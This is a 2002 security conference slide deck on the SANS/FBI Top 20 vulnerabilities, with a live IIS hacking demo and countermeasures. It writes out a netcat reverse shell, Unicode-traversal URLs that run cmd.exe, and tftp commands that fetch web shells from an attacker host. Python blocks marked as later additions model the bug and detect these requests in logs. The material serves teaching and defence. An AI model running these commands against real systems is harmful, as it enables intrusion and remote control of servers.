ISACA December 10 Meeting Dinner Presentation from Foundstone

SANS/FBI Top 20 Vulnerabilities
Contents:
• Overview
• Methodology and Exploits demo (Windows/UNIX)
• Products
Stephan Barnes
Foundstone
December 10, ISACA Dinner Meeting
Overview of SANS/FBI Top 20
Contents:
• The State of Insecurity
• The List Facts
• A Tale of Two Lists
• Also known by their nicknames
The State of Insecurity
• CERT handled 2x as many security incidents in 2001 as in 2000
• 2001 had more than double the vulnerabilities of 2000
• In 2001, 2,437 software vulnerabilities were discovered (CERT)
• That's more than 6 new vulnerabilities per day!
• 325 of these were serious enough to issue a public warning
“The $8 Billion damage by Nimda and Code Red worm attacks alone cost more than all of the security spending after 9/11”
[Chart: Number of Security Threats (Network Intrusions, Viruses)]
Hacking is like Vegas: it's a thrill for many, it's addictive, it's costly, it doesn't care if you win or lose, and it is open for business 24/7/365
The SANS/FBI Top 20
• The Top 20 is actually two Top 10 lists
  • Windows and UNIX
• The "List" originally started with the NIPC and SANS, then evolved to be the SANS/FBI list
• The MAJORITY of attacks come from a MINORITY of unpatched software vulnerabilities!
• "80% of the RISK is represented by 20% of the vulnerabilities"
  • Yes, the "Bad Apple" concept is in effect!
• TIME, and your wasting of it (in not patching systems), is your biggest enemy
• TIME is the hacker's best chance
• The List is "not an end all be all" insurance policy; however, it's a better-than-nothing approach
The (begin the long journey to the sea) List of Vulnerabilities
• Who gives birth to the list?
  • VA Vendors that are most respected and leading innovation
  • About 250 Vulnerabilities are compiled
• This is a special group of folks/thinkers
  • Strong Security DNA!
• Collectively their security knowledge spans many years
  • Renaud Deraison – Nessus
  • Gerhard Eschelbeck – Qualys
  • Bob Todd – SARA
  • Harold Toomey – Symantec
  • Jamie Lau and Chris Klaus – ISS
  • Dave Cole and John Bock – Foundstone
  • Steve Christey – MITRE
    • Home of the CVE (Common Vulnerabilities and Exposures)
    • No VA tools, but maintains the CVE list and sanity
• The group has a strong gene pool that helps ensure your company's internet survivability!
Who Refines the Vulnerability Framework Data?
• A second group of about 45 people (Security Practitioners) from around the world massage the 250 Vulnerabilities
• This next group weeds out the best of the best (very Darwinian)
  • Ever talked to an evangelist?
  • This group lives, breathes, eats, sweats SECURITY daily!
• From the 250 Vulnerabilities provided by the VA Group, this group decides which ones are the most notorious and make the lists
• Once they whittle this group down, they provide the list to SANS/FBI
• SANS/FBI updates and broadcasts
• The VA companies that have categories for just these vulnerabilities check their products and modify their lists and products accordingly
• As new Security Tsunamis hit, the lists are re-evaluated (modified if necessary)
A “Tale of Two Lists”

Windows Systems
• W1 Internet Information Services (IIS)
• W2 Microsoft Data Access Components (MDAC) -- Remote Data Services
• W3 Microsoft SQL Server
• W4 NETBIOS -- Unprotected Windows Networking Shares
• W5 Anonymous Logon -- Null Sessions
• W6 LAN Manager Authentication -- Weak LM Hashing
• W7 General Windows Authentication -- Accounts with No Passwords or Weak Passwords
• W8 Internet Explorer
• W9 Remote Registry Access
• W10 Windows Scripting Host

UNIX Systems
• U1 Remote Procedure Calls (RPC)
• U2 Apache Web Server
• U3 Secure Shell (SSH)
• U4 Simple Network Management Protocol (SNMP)
• U5 File Transfer Protocol (FTP)
• U6 R-Services -- Trust Relationships
• U7 Line Printer Daemon (LPD)
• U8 Sendmail
• U9 BIND/DNS
• U10 General Unix Authentication -- Accounts with No Passwords or Weak Passwords
The Windows List (known by their more common names)
• IIS: many call it … "It Isn't Secure", out-of-the-box time bomb! Unicode, .printer, Buffer Overflows, Rat's nest! (We'll be hacking our way through this tonight)
• MDAC: Did you spend most of 2000-2001 trying to get this fixed? :) We're still finding holes.
• Microsoft SQL Server: Didn't I install a firewall and an IDS? What's up with all of these things not protecting the back-end database? Credit Cards anyone?
• NetBIOS: If you haven't shut this off to the Internet by now, you should probably leave the room; you're probably not really in the game.
• Anonymous Logon: Null Sessions – "share the world"
• Weak LAN Manager Authentication: if you are an auditor and have not run or heard of L0phtCrack… well, you might be in the wrong place :)
• Accounts with No Passwords or Weak Passwords: Administrator with No Password, etc. Look out for your neighbor (ask me later)
• Internet Explorer: one word – Georgi Guninski. I'm sure Bill Gates would love to pull a Lee Harvey Oswald on this guy
• Remote Registry Access: this hurts when you do this wrong.
• Windows Scripting Host: "I love you" – email VBS; that date was a nightmare!
The UNIX List (known by their more common names)
• Remote Procedure Calls (RPC): tooltalk, sadmind, mountd, statd – Buffer Overflows (some old, some new, some borrowed, some blue)
• Apache Web Server: "Well, since IIS isn't getting it done.." CGI (Come Get (me) Internet)
• Secure Shell (SSH): ….sshhhh be quiet . . . sometimes it's not secure
• Simple Network Management Protocol (SNMP): (the MIB) is not a cool movie with guys in black, it's the message information block and it provides an avenue to attack
• File Transfer Protocol (FTP): This exploit will really woo you! (wu-FTP)
• R-Services -- Trust Relationships: remember this motto, Friends… "Friends of Friends are not always Friends"
• Line Printer Daemon (LPD): such a simple task used for malicious purpose
• Sendmail: read my email and execute this while you're at it.
• BIND/DNS: you'll be in one if you don't get this fixed
• Accounts with No Passwords or Weak Passwords: You should know better
Methodology/Exploits
Contents:
• Methodology
• Tools
• Windows Exploit
• Countermeasures
• UNIX Exploit (time permitting)
• Countermeasures
The Methodology we use at Foundstone
• Footprint
• Scan
• Enumerate
• Penetrate
• Escalate
• Pillage
• Get Interactive
• Expand influence
• Cleanup
• (Denial of Service)
We Wrote Them
Tools Available – (non commercial)
• We will concentrate on the underlined tools to demo various hacks tonight
  • Everything here (except for the proprietary exploits) is available on the internet
  • Also check the Hacking Exposed site (www.hackingexposed.com)
• Footprint – ARIN database, Sam Spade, SEC, WS_Ping ProPack
• Scan – fscan, scanline, superscan, nmap, pinger, strobe
• Enumerate – netcat, dumpacl, dumpreg, epdump, NT Resource Kit
• Penetrate – l0phtcrack, smbgrind, public/private exploits
• Escalate – getadmin, john, netbus, netcat, pwdump2, sechole
• Pillage – teleport pro, wget
Windows Exploit – IIS Vulnerabilities
• We'll do a hacking demo tonight that will cover Number 1 on the SANS/FBI Top 20 for Windows:
  • Buffer overflows
  • File System Traversal and script source revelation
  • Privilege Escalation
• The most effective way to compromise a Windows NT/2000 system is via Internet Information Server (IIS)
• IIS is installed by default and listens on TCP 80; many don't realize it's there and vulnerable; you should
• Those who run their Website on IIS can't just block access to it; Windows 2000 ships with IIS version 5 (IIS5)
Windows Exploit in IIS Part 1 - Buffer Overflow
• Internet Printing Protocol (IPP) functionality is implemented in IIS 5 via an ISAPI filter (C:\WINNT\System32\msw3prt.dll)
• This functionality is enabled by default
• Malformed requests for .printer files invoke this ISAPI and cause a buffer overflow, resulting in remote SYSTEM privileges
• Published exploits:
  • jill-win32.exe by dark spyrit (we'll use jill-win32.exe)
  • Iis5hack.exe by hsj
• How does it work:
  • Remotely exploits buffer overflow
  • Inserts shellcode to "shovel a shell" back to a listener on attacker's system
Windows Exploit in IIS Part 1 - Buffer Overflow
• Footprint is done – you have a Victim
• Ping to make sure you can reach it
  • ping 10.1.1.2
• Scan the victim with fscan
  • fscan 10.1.1.2 (default ports will work)
• Enumerate the victim with netcat: nc -v 10.1.1.2 80
  • We see that the header is IIS 5.0 (probable victim)
• Penetrate the victim with public/private exploits
• Escalate privilege with public/private exploits
Windows Exploit in IIS Part 1 - Buffer Overflow
• How the hack works (Example Buffer Overflow in IPP)
• Start netcat listener on the attacker:
  nc -vv -l -p 3003 10.1.1.2
• Execute jill-win32 on the attacker:
  jill-win32 victim 80 attacker 3003
• If this works correctly, a shell pops up on the attacker's machine from the victim.
• You are now in SYSTEM context on the victim
• Local Hitch.. (we'll see if you can figure it out)
Windows Exploit in IIS Part 1 - Buffer Overflow (review)
Run netcat listener on attacker's machine:
C:\>nc -vv -l -p 3003 10.1.1.2
listening on [any] 3003 ...
connect to [localhost] from VICTIM.COM
[ carriage return]
Remote command prompt from victim!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
Running with SYSTEM privileges!
C:\WINNT\system32>whoami
whoami
[ carriage return]
NT AUTHORITY\SYSTEM
GAME OVER
Windows Exploit in IIS Part 2 – File System Traversal
• Same Victim (Unicode Exploit)
• http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir
• http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+..\
• http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+..\..\
• Browse away! View the contents of the directory because the UNICODE patch is not applied
  • IIS decodes Unicode after path checking, not before
  • The representation for "/" is %c0%af
• WHY? Because users of IIS are automatically given the access rights associated with the IUSR_machinename user account. The IUSR_machinename account is a member of the "everyone" and "users" groups by default. Any file on the same logical drive and any web-accessible file that is accessible to these groups can be deleted, modified or executed
• Covered in MS00-078 and MS00-057
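The ordering bug the slide describes (check the path, then decode the overlong %c0%af), modelled in Python as an added example that is not part of the original presentation; the web root, paths and lenient decoder are constructed assumptions. The "vulnerable" function reproduces the bug, the "hardened" one decodes strictly and canonicalizes before the root check, which is the ordering MS00-078 restores.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote_to_bytes

WEB_ROOT = "/inetpub"   # constructed: /scripts lives under it, /winnt does not


def lenient_utf8(raw: bytes) -> str:
    """Decode UTF-8 the way the unpatched server did: a 2-byte form whose lead
    byte is C0/C1 is accepted although it is overlong (C0 AF -> '/')."""
    out, i = [], 0
    while i < len(raw):
        lead = raw[i]
        if 0xC0 <= lead <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(lead))
            i += 1
    return "".join(out)


def vulnerable_resolve(uri_path: str) -> Optional[str]:
    """Check, then decode: the ordering on the slide. The '..' test runs on
    still-encoded segments, so '..%c0%af..' is not recognised as traversal."""
    segments = uri_path.replace("\\", "/").split("/")
    if ".." in segments:
        return None
    decoded = lenient_utf8(unquote_to_bytes(uri_path)).replace("\\", "/")
    return posixpath.normpath(WEB_ROOT + decoded)


def hardened_resolve(uri_path: str) -> Optional[str]:
    """Decode strictly and canonicalize first, then enforce the web root."""
    try:
        decoded = unquote_to_bytes(uri_path).decode("utf-8")  # raises on overlong C0 AF
    except UnicodeDecodeError:
        return None
    full = posixpath.normpath(WEB_ROOT + decoded.replace("\\", "/"))
    if full != WEB_ROOT and not full.startswith(WEB_ROOT + "/"):
        return None  # canonical path left the web root
    return full


if __name__ == "__main__":
    request = "/scripts/..%c0%af../winnt/system32/cmd.exe"
    print("vulnerable:", vulnerable_resolve(request))  # /winnt/system32/cmd.exe
    print("hardened:  ", hardened_resolve(request))    # None
```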
Windows Exploit in IIS Part 3 – Privilege Escalation (begin)
• Same Victim (we will use the Unicode Exploit to shovel our goods up to the victim)
• We will use our local TFTP and the victim's TFTP
• Start TFTP on attacker (configure appropriately)
• Use Victim to TFTP up cmdasp.asp
  • http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+tftp+-i+10.1.1.1+GET+cmdasp.asp+cmdasp.asp
  • You may get an error that the command didn't return; surf back to the scripts directory using the Unicode exploit
• Use Victim to run cmdasp.asp to test
  • http://10.1.1.2/scripts/cmdasp.asp
• Now you have a nice remote command processor
• Type any command and see!
• Hang on, we're just getting started!
Windows Exploit in IIS Part 3 – Privilege Escalation (continued)
• Same Victim (we will use the Unicode Exploit to shovel our goods up to the victim)
• We will use our local TFTP and the victim's TFTP again
• TFTP is started on attacker (configure appropriately)
• Use Victim to TFTP up upload.asp and upload.inc
  • http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+tftp+-i+10.1.1.1+GET+upload.asp+upload.asp
  • http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+tftp+-i+10.1.1.1+GET+upload.inc+upload.inc
  • You can recheck that it made it using Unicode or your brand new remote command processor
    (http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir)
• http://10.1.1.2/scripts/upload.asp
• Now you have a nice remote file uploader
• Send up the goods
• Send up whoami.exe (you'll need this)
Windows Exploit in IIS Part 3 – Privilege Escalation (end)
• Run whoami via cmdasp
• You can see we are the IUSR
• Goal is to become part of the ADMIN group
• Using the uploader, upload idq.dll
  • May get that pesky error msg again that the page may not be displayed. Ignore that!
• Run net localgroup administrators via cmdasp
• You are now part of the ADMIN group!
• Do I need to go any further?
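A detection pass over constructed IIS W3C log lines covering the Part 2 and Part 3 request chain above (overlong escapes, cmd.exe outside the web root, tftp in the query, .printer requests, and the dropped ASP tools). This is an added example, not from the presentation; it assumes the field layout shown and decodes each URI before matching, since a server may log either the raw or the decoded form.

```python
import re
from urllib.parse import unquote

# Constructed sample in IIS W3C extended format; not taken from a real server.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-12-10 19:02:11 10.1.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2002-12-10 19:03:40 10.1.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+10.1.1.1+GET+cmdasp.asp+cmdasp.asp 502
2002-12-10 19:04:05 10.1.1.1 GET /scripts/cmdasp.asp - 200
2002-12-10 19:05:22 10.1.1.1 GET /NULL.printer - 200
2002-12-10 19:06:30 10.1.1.9 GET /default.htm - 200
"""

# Any 2-byte UTF-8 sequence with lead byte C0 or C1 is overlong; %c0%af is the slide's '/'.
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.I)
# Files the slides push to the victim through the web server.
DROPPED_TOOLS = ("cmdasp.asp", "upload.asp", "upload.inc", "whoami.exe", "idq.dll")


def inspect_request(stem: str, query: str) -> list:
    """Return the reasons one request matches the IIS attack chain on these slides."""
    reasons = []
    decoded_stem = unquote(stem).replace("\\", "/").lower()
    decoded_query = unquote(query).replace("+", " ").lower()
    if OVERLONG.search(stem):
        reasons.append("overlong UTF-8 escape in URI (Unicode traversal, MS00-078)")
    if "/.." in decoded_stem or "cmd.exe" in decoded_stem:
        reasons.append("cmd.exe or parent-directory reference in URI")
    if "tftp" in decoded_query:
        reasons.append("tftp in query: file transfer driven through the web server")
    if decoded_stem.endswith(".printer"):
        reasons.append(".printer request reaches msw3prt.dll (IPP ISAPI)")
    if any(decoded_stem.endswith("/" + tool) for tool in DROPPED_TOOLS):
        reasons.append("known dropped tool requested: " + decoded_stem.rsplit("/", 1)[-1])
    return reasons


def scan_log(text: str) -> list:
    """Return (time, client ip, reasons) for each suspicious line; skips '#' directives."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, time, ip, _method, stem, query, _status = line.split(" ", 6)
        reasons = inspect_request(stem, query)
        if reasons:
            hits.append((time, ip, reasons))
    return hits
```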
Countermeasures to protect IIS
There are many, but in general: un-map unused extensions in IIS, and HARDEN and PATCH everything, and often.

If you don't use:              Remove this entry:
Web-based password reset       .htr
Internet Database Connector    .idc
Server-side Includes           .stm, .shtm, .shtml
Internet Printing              .printer
Index Server                   .htw, .ida and .idq
UNIX Exploit - WU-ftp (time permitting)
• Washington University FTP (WU-ftp) is one of the most widely used FTPs
• Can be installed on a large variety of UNIX systems
• Is not hard to determine if vulnerable
  • Login anonymously
  • Type: ls ~{
  • (If it closes the connection then it's vulnerable)
• It is a Heap Corruption Vulnerability
  • Different section of memory
Countermeasures to protect WU-ftp
• Possibly consider other FTP programs than Washington University (WU-ftp)
• If you are running it, get as close to the current patch level as you can
Products: SANS/FBI Top 20
Contents:
• Products
• FoundScan Demo
Tools and Services that Check for the Top 20
• Qualys: QualysGuard
• Harris: STAT Scanner
• ISS: Internet Scanner
• SAINT Corporation
• Advanced Research Corp: SARA
• Nessus: Nessus Security Scanner
• Foundstone: FoundScan
  • Demo on Victims if time
Contact
• Foundstone
  • 27201 Puerta Real, Mission Viejo, CA 92691
  • 949-297-5600
• Stephan Barnes
  • VP of the Western Region, 949-297-5590
  • [email protected], [email protected]
  • http://www.m4phr1k.com (war dialing site)
• Professional Services (including private training)
  • [email protected] or [email protected]
• FoundScan
  • [email protected]
• Training (Public)
  • Available at www.foundstone.com in the education section
Leave No Stone Unturned…